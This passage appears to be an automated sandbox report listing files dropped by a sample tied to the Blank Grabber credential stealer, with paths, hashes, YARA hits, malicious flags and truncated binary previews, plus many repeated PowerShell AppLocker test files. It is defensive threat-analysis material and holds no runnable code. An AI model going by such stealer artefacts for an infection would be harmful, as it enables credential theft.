C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.471120785534753
Encrypted:	false
SSDEEP:	768:VGXeQMA/KHhhtpoDeI1QGcq5YiSyvXAMxkEm:VBA/KHhhwDeI1QGco7Syfxq
MD5:	33722C8CD45091D31AEF81D8A1B72FA8
SHA1:	E9043D440235D244FF9934E9694C5550CAE2D5AB
SHA-256:	366FCA0B27A34835129086C8CDE1E75C309849E37091DB4ADEDA1BE508F2EE12
SHA-512:	74217ABEC2727BAAA5138E1B1C4BAC7D0CA574CF5A377396FC1CA0D3C07BEB8AAA374E8060D2B5F707426312C11E0A34527EE0190E979E996F3B822EFA24852F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 2%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.0..........0.....................................................`......................................... ...L....................`..............l.......................................@...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	660248
Entropy (8bit):	7.9932751689375285
Encrypted:	true
SSDEEP:	12288:CjFc9XUn2iq3Z7tTogf3AKuApDVPXyHaDRtIRqMo4UE0AzcNzeMbziw:398qt37rXy6N60MolE0scNrp
MD5:	68B435A35F9DCBC10B3CD4B30977B0BD
SHA1:	9726EF574CA9BDA8EC9AB85A5B97ADCDF148A41F
SHA-256:	240D6D3EFAC25AF08FE41A60E181F8FDCB6F95DA53B3FAD54B0F96680E7A8277
SHA-512:	8E133B72BD3776F961258793C2B82D2CD536C7AE0ED0241DAA2F67D90A6968F563B72F74A1C33D9BDFB821B796612FAA7A73A712369FF3B36D968E57BFCDD793
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tB..,...,...,..m....,.D.-...,.D./...,.D.(...,.D.)...,..m-...,...-...,...$...,...,...,......,.......,.Rich..,.........PE..d......f.........." ...(.....0............................................................`..............................................#.......................................................................... ...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\sB2ClgrGng.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	303384
Entropy (8bit):	7.98532051715837
Encrypted:	false
SSDEEP:	6144:PuQ0qZzMWlZe6+dTxmH1wne4P7dK5H4lT3yfd6o0VSi2Erk8BnJ1Ah:PuQ0wAWlc6+dg1wb7/82UUrk8BnJ1Ah
MD5:	6DD43E115402D9E1C7CD6F21D47CFCF5
SHA1:	C7FB8F33F25B0B75FC05EF0785622AA4EC09503C
SHA-256:	2A00F41BBC3680807042FC258F63519105220053FB2773E7D35480515FAD9233
SHA-512:	72E266EB1CE5CBBCFD1D2A6F864538EFD80B3ED844E003E2BD9566708FEE0919447290A3B559EA27C32794F97A629A8FE8FC879654FFA609FCA5C053DAC70C69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}...%.}..\|.!.}..~. .}..y.+.}..*x...}.6-\|. .}.h.\|.!.}.#.\|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.`....... .......0................................................`.............................................X....................@..........................................................@...........................................UPX0..... ..............................UPX1.....`...0...`..................@....rsrc................d..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11gu0fnd.k2r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2blbqggg.02m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jeh404a.0hl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axsy1ahk.owl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbi2qw1r.vfm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2ubpqua.itu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehf5uq5h.gr5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoozeasq.xol.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5hwmpb4.zbb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3rv2o4m.223.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hotdhjw5.hs2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiksovxh.hiu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqoq1r12.2tn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l45qwzss.uhg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzkj5uxg.1m5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5ou2qhr.jjb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oguaqej5.dox.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqob2ocd.xwu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkijazon.g12.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4zctjnl.ge4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scbvfnjn.2lg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scpdvtzq.4qa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seg5ls1j.bu0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spliepfc.b4f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsllid50.opd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umqrwf1h.imm.psm1

Download File

